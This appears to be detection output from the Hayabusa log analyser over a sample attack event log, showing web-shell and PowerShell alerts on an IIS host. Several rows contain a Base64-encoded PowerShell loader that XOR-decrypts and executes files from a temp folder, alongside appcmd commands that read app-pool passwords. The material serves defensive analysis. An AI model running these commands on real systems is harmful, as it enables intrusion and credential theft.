PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgA